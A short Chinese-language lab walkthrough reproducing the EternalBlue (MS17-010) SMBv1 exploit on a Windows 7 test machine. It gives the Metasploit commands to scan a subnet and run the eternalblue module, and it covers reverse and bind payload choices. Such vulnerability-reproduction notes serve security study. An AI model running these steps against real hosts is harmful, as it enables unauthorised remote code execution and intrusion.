原理:永恒之蓝通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞、恶意代码会扫描开放445文件共享端口的windows机器
受影响版本:windows2000、windows xp、windows2003、windows 7、windows 8、windows 2008等版本
漏洞复现:
首先该漏洞是由SMB协议引发的,所以在win7中设置防火墙入站规则,需要打开SMB协议打印机共享。
然后在kali端启动msf
使用扫描模块扫描目标网段,查看是否有主机存在该漏洞
use auxiliary/scanner/smb/smb_ms17_010
查看哪些参数需要设置
show options
其中,required为yes的参数是需要设置的,no一般使用默认值
设置扫描网段
set rhosts 192.168.198.0/24
设置线程
set threads 50
执行
run
发现192.168.198.132这台机子可能存在该漏洞,于是使用攻击模块,show exploit指令可以查看有哪些攻击模块可以使用,其中里面参数reserve表示等待对方连接我的服务器
bind表示我的服务器连接目标机
reverse_tcp_rc4表示用rc4进行加密,以增加通过防火墙的安全能力
bing相关的载荷:若远程溢出的程序在外网而我在内网,就不能使对方连接我的服务器而应该是我主动连接对方的服务器
我们使用windows/smb/ms17_010_eternalblue这个攻击模块
设置被攻击主机
set rhosts 192.168.198.132
进行攻击
exploit
可见攻击成功,能执行命令,接下来就是提权和载荷持久化的操作了。